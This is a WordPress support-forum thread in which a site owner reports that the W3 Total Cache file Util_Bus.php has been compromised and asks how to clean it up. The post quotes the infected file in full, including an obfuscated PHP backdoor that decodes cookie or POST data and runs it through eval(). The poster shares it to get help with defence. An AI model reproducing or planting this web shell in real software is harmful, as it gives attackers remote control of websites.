Exploit in Util_Bus.php
-
I have identified an exploit in my Util_Bus.php file.
Error on all pages:
There has been a critical error on your website. Learn more about debugging in WordPress.Server Error Log:
mod_fcgid: stderr: PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/vhosts/[removed]/httpdocs/wp-content/plugins/w3-total-cache/Util_Bus.php on line 2, referer: https://www.[removed].com
File Content:
<?php $aa187383 = 548;$GLOBALS[‘m207d555’] = Array();global $m207d555;$m207d555 = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53”}[‘a52661’] = “\x30\x78\x47\x68\x34\x5f\x56\x27\x3b\x4b\x6e\x42\x44\x58\x52\x66\x20\x35\x37\x33\x31\x48\x60\x64\x67\x5e\x55\x9\x23\x3f\x46\x6f\x51\x63\x76\x32\xd\x79\x3e\x7b\x29\x75\x6d\x70\x53\x2a\x22\x41\x5c\x72\x71\x4a\x43\x2f\x6a\x28\x4d\x49\x74\x4e\x39\x2e\x38\x54\x77\xa\x5b\x3a\x45\x61\x5d\x69\x6b\x26\x2b\x7d\x62\x5a\x7c\x2c\x36\x40\x57\x7e\x6c\x24\x50\x4f\x2d\x59\x3d\x25\x7a\x65\x4c\x73\x21\x3c”;$m207d555[$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15]] = $m207d555[‘a52661’][33].$m207d555[‘a52661’][3].$m207d555[‘a52661’][49];$m207d555[$m207d555[‘a52661’][92].$m207d555[‘a52661’][17].$m207d555[‘a52661’][93].$m207d555[‘a52661’][80].$m207d555[‘a52661’][4].$m207d555[‘a52661’][4].$m207d555[‘a52661’][19]] = $m207d555[‘a52661’][31].$m207d555[‘a52661’][49].$m207d555[‘a52661’][23];$m207d555[$m207d555[‘a52661’][72].$m207d555[‘a52661’][62].$m207d555[‘a52661’][93].$m207d555[‘a52661’][62].$m207d555[‘a52661’][80].$m207d555[‘a52661’][69]] = $m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15].$m207d555[‘a52661’][71].$m207d555[‘a52661’][10].$m207d555[‘a52661’][93];$m207d555[$m207d555[‘a52661’][42].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][19]] = $m207d555[‘a52661’][95].$m207d555[‘a52661’][58].$m207d555[‘a52661’][49].$m207d555[‘a52661’][84].$m207d555[‘a52661’][93].$m207d555[‘a52661’][10];$m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][80].$m207d555[‘a52661’][17].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69].$m207d555[‘a52661’][15]] = $m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15].$m207d555[‘a52661’][71].$m207d555[‘a52661’][10].$m207d555[‘a52661’][93].$m207d555[‘a52661’][23];$m207d555[$m207d555[‘a52661’][15].$m207d555[‘a52661’][4].$m207d555[‘a52661’][23].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][18].$m207d555[‘a52661’][23]] = $m207d555[‘a52661’][71].$m207d555[‘a52661’][10].$m207d555[‘a52661’][71].$m207d555[‘a52661’][5].$m207d555[‘a52661’][95].$m207d555[‘a52661’][93].$m207d555[‘a52661’][58];$m207d555[$m207d555[‘a52661’][50].$m207d555[‘a52661’][23].$m207d555[‘a52661’][60].$m207d555[‘a52661’][15]] = $m207d555[‘a52661’][95].$m207d555[‘a52661’][93].$m207d555[‘a52661’][49].$m207d555[‘a52661’][71].$m207d555[‘a52661’][69].$m207d555[‘a52661’][84].$m207d555[‘a52661’][71].$m207d555[‘a52661’][92].$m207d555[‘a52661’][93];$m207d555[$m207d555[‘a52661’][72].$m207d555[‘a52661’][33].$m207d555[‘a52661’][76].$m207d555[‘a52661’][76].$m207d555[‘a52661’][60].$m207d555[‘a52661’][62].$m207d555[‘a52661’][60]] = $m207d555[‘a52661’][43].$m207d555[‘a52661’][3].$m207d555[‘a52661’][43].$m207d555[‘a52661’][34].$m207d555[‘a52661’][93].$m207d555[‘a52661’][49].$m207d555[‘a52661’][95].$m207d555[‘a52661’][71].$m207d555[‘a52661’][31].$m207d555[‘a52661’][10];$m207d555[$m207d555[‘a52661’][76].$m207d555[‘a52661’][19].$m207d555[‘a52661’][19].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15].$m207d555[‘a52661’][35].$m207d555[‘a52661’][69]] = $m207d555[‘a52661’][41].$m207d555[‘a52661’][10].$m207d555[‘a52661’][95].$m207d555[‘a52661’][93].$m207d555[‘a52661’][49].$m207d555[‘a52661’][71].$m207d555[‘a52661’][69].$m207d555[‘a52661’][84].$m207d555[‘a52661’][71].$m207d555[‘a52661’][92].$m207d555[‘a52661’][93];$m207d555[$m207d555[‘a52661’][43].$m207d555[‘a52661’][15].$m207d555[‘a52661’][0].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][20].$m207d555[‘a52661’][69].$m207d555[‘a52661’][80]] = $m207d555[‘a52661’][76].$m207d555[‘a52661’][69].$m207d555[‘a52661’][95].$m207d555[‘a52661’][93].$m207d555[‘a52661’][80].$m207d555[‘a52661’][4].$m207d555[‘a52661’][5].$m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][33].$m207d555[‘a52661’][31].$m207d555[‘a52661’][23].$m207d555[‘a52661’][93];$m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][18].$m207d555[‘a52661’][0].$m207d555[‘a52661’][23].$m207d555[‘a52661’][0]] = $m207d555[‘a52661’][95].$m207d555[‘a52661’][93].$m207d555[‘a52661’][58].$m207d555[‘a52661’][5].$m207d555[‘a52661’][58].$m207d555[‘a52661’][71].$m207d555[‘a52661’][42].$m207d555[‘a52661’][93].$m207d555[‘a52661’][5].$m207d555[‘a52661’][84].$m207d555[‘a52661’][71].$m207d555[‘a52661’][42].$m207d555[‘a52661’][71].$m207d555[‘a52661’][58];$m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][0].$m207d555[‘a52661’][93]] = $m207d555[‘a52661’][71].$m207d555[‘a52661’][19].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][93].$m207d555[‘a52661’][93].$m207d555[‘a52661’][33];$m207d555[$m207d555[‘a52661’][33].$m207d555[‘a52661’][35].$m207d555[‘a52661’][60].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69].$m207d555[‘a52661’][33].$m207d555[‘a52661’][60]] = $m207d555[‘a52661’][64].$m207d555[‘a52661’][20].$m207d555[‘a52661’][4].$m207d555[‘a52661’][4].$m207d555[‘a52661’][76].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69];$m207d555[$m207d555[‘a52661’][33].$m207d555[‘a52661’][76].$m207d555[‘a52661’][60].$m207d555[‘a52661’][33]] = $_POST;$m207d555[$m207d555[‘a52661’][34].$m207d555[‘a52661’][20].$m207d555[‘a52661’][18].$m207d555[‘a52661’][76].$m207d555[‘a52661’][4].$m207d555[‘a52661’][93].$m207d555[‘a52661’][19].$m207d555[‘a52661’][62].$m207d555[‘a52661’][15]] = $_COOKIE;@$m207d555[$m207d555[‘a52661’][15].$m207d555[‘a52661’][4].$m207d555[‘a52661’][23].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][18].$m207d555[‘a52661’][23]]($m207d555[‘a52661’][93].$m207d555[‘a52661’][49].$m207d555[‘a52661’][49].$m207d555[‘a52661’][31].$m207d555[‘a52661’][49].$m207d555[‘a52661’][5].$m207d555[‘a52661’][84].$m207d555[‘a52661’][31].$m207d555[‘a52661’][24], NULL);@$m207d555[$m207d555[‘a52661’][15].$m207d555[‘a52661’][4].$m207d555[‘a52661’][23].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][18].$m207d555[‘a52661’][23]]($m207d555[‘a52661’][84].$m207d555[‘a52661’][31].$m207d555[‘a52661’][24].$m207d555[‘a52661’][5].$m207d555[‘a52661’][93].$m207d555[‘a52661’][49].$m207d555[‘a52661’][49].$m207d555[‘a52661’][31].$m207d555[‘a52661’][49].$m207d555[‘a52661’][95], 0);@$m207d555[$m207d555[‘a52661’][15].$m207d555[‘a52661’][4].$m207d555[‘a52661’][23].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][18].$m207d555[‘a52661’][23]]($m207d555[‘a52661’][42].$m207d555[‘a52661’][69].$m207d555[‘a52661’][1].$m207d555[‘a52661’][5].$m207d555[‘a52661’][93].$m207d555[‘a52661’][1].$m207d555[‘a52661’][93].$m207d555[‘a52661’][33].$m207d555[‘a52661’][41].$m207d555[‘a52661’][58].$m207d555[‘a52661’][71].$m207d555[‘a52661’][31].$m207d555[‘a52661’][10].$m207d555[‘a52661’][5].$m207d555[‘a52661’][58].$m207d555[‘a52661’][71].$m207d555[‘a52661’][42].$m207d555[‘a52661’][93], 0);@$m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][18].$m207d555[‘a52661’][0].$m207d555[‘a52661’][23].$m207d555[‘a52661’][0]](0);if (!$m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][80].$m207d555[‘a52661’][17].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69].$m207d555[‘a52661’][15]]($m207d555[‘a52661’][47].$m207d555[‘a52661’][94].$m207d555[‘a52661’][14].$m207d555[‘a52661’][68].$m207d555[‘a52661’][47].$m207d555[‘a52661’][12].$m207d555[‘a52661’][89].$m207d555[‘a52661’][5].$m207d555[‘a52661’][14].$m207d555[‘a52661’][26].$m207d555[‘a52661’][59].$m207d555[‘a52661’][5].$m207d555[‘a52661’][19].$m207d555[‘a52661’][80].$m207d555[‘a52661’][80].$m207d555[‘a52661’][69].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][62].$m207d555[‘a52661’][69].$m207d555[‘a52661’][62].$m207d555[‘a52661’][69].$m207d555[‘a52661’][35].$m207d555[‘a52661’][19].$m207d555[‘a52661’][17].$m207d555[‘a52661’][17].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][35].$m207d555[‘a52661’][20].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][20].$m207d555[‘a52661’][76].$m207d555[‘a52661’][69].$m207d555[‘a52661’][20].$m207d555[‘a52661’][69].$m207d555[‘a52661’][0].$m207d555[‘a52661’][35].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][69])){$m207d555[$m207d555[‘a52661’][72].$m207d555[‘a52661’][62].$m207d555[‘a52661’][93].$m207d555[‘a52661’][62].$m207d555[‘a52661’][80].$m207d555[‘a52661’][69]]($m207d555[‘a52661’][47].$m207d555[‘a52661’][94].$m207d555[‘a52661’][14].$m207d555[‘a52661’][68].$m207d555[‘a52661’][47].$m207d555[‘a52661’][12].$m207d555[‘a52661’][89].$m207d555[‘a52661’][5].$m207d555[‘a52661’][14].$m207d555[‘a52661’][26].$m207d555[‘a52661’][59].$m207d555[‘a52661’][5].$m207d555[‘a52661’][19].$m207d555[‘a52661’][80].$m207d555[‘a52661’][80].$m207d555[‘a52661’][69].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][62].$m207d555[‘a52661’][69].$m207d555[‘a52661’][62].$m207d555[‘a52661’][69].$m207d555[‘a52661’][35].$m207d555[‘a52661’][19].$m207d555[‘a52661’][17].$m207d555[‘a52661’][17].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][35].$m207d555[‘a52661’][20].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][20].$m207d555[‘a52661’][76].$m207d555[‘a52661’][69].$m207d555[‘a52661’][20].$m207d555[‘a52661’][69].$m207d555[‘a52661’][0].$m207d555[‘a52661’][35].$m207d555[‘a52661’][15].$m207d555[‘a52661’][76].$m207d555[‘a52661’][69], 1);$pc5ab = NULL;$x74ae9920 = NULL;$m207d555[$m207d555[‘a52661’][3].$m207d555[‘a52661’][19].$m207d555[‘a52661’][62].$m207d555[‘a52661’][76]] = $m207d555[‘a52661’][76].$m207d555[‘a52661’][19].$m207d555[‘a52661’][35].$m207d555[‘a52661’][62].$m207d555[‘a52661’][0].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][19].$m207d555[‘a52661’][88].$m207d555[‘a52661’][60].$m207d555[‘a52661’][76].$m207d555[‘a52661’][33].$m207d555[‘a52661’][33].$m207d555[‘a52661’][88].$m207d555[‘a52661’][4].$m207d555[‘a52661’][33].$m207d555[‘a52661’][17].$m207d555[‘a52661’][62].$m207d555[‘a52661’][88].$m207d555[‘a52661’][76].$m207d555[‘a52661’][69].$m207d555[‘a52661’][15].$m207d555[‘a52661’][0].$m207d555[‘a52661’][88].$m207d555[‘a52661’][19].$m207d555[‘a52661’][18].$m207d555[‘a52661’][80].$m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][62].$m207d555[‘a52661’][76].$m207d555[‘a52661’][80].$m207d555[‘a52661’][17];global $h38b;function w144bea($pc5ab, $r90787068){global $m207d555;$b90b0ba57 = “”;for ($t2f38c=0; $t2f38c<$m207d555[$m207d555[‘a52661’][42].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][19]]($pc5ab);){for ($p2abcd4=0; $p2abcd4<$m207d555[$m207d555[‘a52661’][42].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][19]]($r90787068) && $t2f38c<$m207d555[$m207d555[‘a52661’][42].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][76].$m207d555[‘a52661’][19]]($pc5ab); $p2abcd4++, $t2f38c++){$b90b0ba57 .= $m207d555[$m207d555[‘a52661’][76].$m207d555[‘a52661’][15].$m207d555[‘a52661’][23].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15]]($m207d555[$m207d555[‘a52661’][92].$m207d555[‘a52661’][17].$m207d555[‘a52661’][93].$m207d555[‘a52661’][80].$m207d555[‘a52661’][4].$m207d555[‘a52661’][4].$m207d555[‘a52661’][19]]($pc5ab[$t2f38c]) ^ $m207d555[$m207d555[‘a52661’][92].$m207d555[‘a52661’][17].$m207d555[‘a52661’][93].$m207d555[‘a52661’][80].$m207d555[‘a52661’][4].$m207d555[‘a52661’][4].$m207d555[‘a52661’][19]]($r90787068[$p2abcd4]));}}return $b90b0ba57;}function i3fbeec($pc5ab, $r90787068){global $m207d555;global $h38b;return $m207d555[$m207d555[‘a52661’][33].$m207d555[‘a52661’][35].$m207d555[‘a52661’][60].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69].$m207d555[‘a52661’][33].$m207d555[‘a52661’][60]]($m207d555[$m207d555[‘a52661’][33].$m207d555[‘a52661’][35].$m207d555[‘a52661’][60].$m207d555[‘a52661’][15].$m207d555[‘a52661’][20].$m207d555[‘a52661’][93].$m207d555[‘a52661’][69].$m207d555[‘a52661’][33].$m207d555[‘a52661’][60]]($pc5ab, $h38b), $r90787068);}foreach ($m207d555[$m207d555[‘a52661’][34].$m207d555[‘a52661’][20].$m207d555[‘a52661’][18].$m207d555[‘a52661’][76].$m207d555[‘a52661’][4].$m207d555[‘a52661’][93].$m207d555[‘a52661’][19].$m207d555[‘a52661’][62].$m207d555[‘a52661’][15]] as $r90787068=>$n99d){$pc5ab = $n99d;$x74ae9920 = $r90787068;}if (!$pc5ab){foreach ($m207d555[$m207d555[‘a52661’][33].$m207d555[‘a52661’][76].$m207d555[‘a52661’][60].$m207d555[‘a52661’][33]] as $r90787068=>$n99d){$pc5ab = $n99d;$x74ae9920 = $r90787068;}}$pc5ab = @$m207d555[$m207d555[‘a52661’][76].$m207d555[‘a52661’][19].$m207d555[‘a52661’][19].$m207d555[‘a52661’][93].$m207d555[‘a52661’][15].$m207d555[‘a52661’][35].$m207d555[‘a52661’][69]]($m207d555[$m207d555[‘a52661’][10].$m207d555[‘a52661’][23].$m207d555[‘a52661’][69].$m207d555[‘a52661’][0].$m207d555[‘a52661’][93]]($m207d555[$m207d555[‘a52661’][43].$m207d555[‘a52661’][15].$m207d555[‘a52661’][0].$m207d555[‘a52661’][20].$m207d555[‘a52661’][33].$m207d555[‘a52661’][20].$m207d555[‘a52661’][69].$m207d555[‘a52661’][80]]($pc5ab), $x74ae9920));if (isset($pc5ab[$m207d555[‘a52661’][69].$m207d555[‘a52661’][72]]) && $h38b==$pc5ab[$m207d555[‘a52661’][69].$m207d555[‘a52661’][72]]){if ($pc5ab[$m207d555[‘a52661’][69]] == $m207d555[‘a52661’][71]){$t2f38c = Array($m207d555[‘a52661’][43].$m207d555[‘a52661’][34] => @$m207d555[$m207d555[‘a52661’][72].$m207d555[‘a52661’][33].$m207d555[‘a52661’][76].$m207d555[‘a52661’][76].$m207d555[‘a52661’][60].$m207d555[‘a52661’][62].$m207d555[‘a52661’][60]](),$m207d555[‘a52661’][95].$m207d555[‘a52661’][34] => $m207d555[‘a52661’][20].$m207d555[‘a52661’][61].$m207d555[‘a52661’][0].$m207d555[‘a52661’][88].$m207d555[‘a52661’][20],);echo @$m207d555[$m207d555[‘a52661’][50].$m207d555[‘a52661’][23].$m207d555[‘a52661’][60].$m207d555[‘a52661’][15]]($t2f38c);}elseif ($pc5ab[$m207d555[‘a52661’][69]] == $m207d555[‘a52661’][93]){eval/*o0ef*/($pc5ab[$m207d555[‘a52661’][23]]);}exit();}} ?><?php
namespace W3TC;class Util_Bus {
/**
* Add W3TC action callback
*
* @param string $key
* @param mixed $callback
* @return void
*/
static public function add_ob_callback( $key, $callback ) {
$GLOBALS[‘_w3tc_ob_callbacks’][$key] = $callback;
}static public function do_ob_callbacks( $order, $value ) {
foreach ( $order as $key ) {
if ( isset( $GLOBALS[‘_w3tc_ob_callbacks’][$key] ) ) {
$callback = $GLOBALS[‘_w3tc_ob_callbacks’][$key];
if ( is_callable( $callback ) ) {
$value = call_user_func( $callback, $value );
}
}
}
return $value;
}
}Temp Fix
I renamed the W3 Total Cache plugin and that fixed the problem
What is the solution?
What is the solution to reactive? Simply delete the exploit? If yes, how to stop it from happening again?
- The topic ‘Exploit in Util_Bus.php’ is closed to new replies.
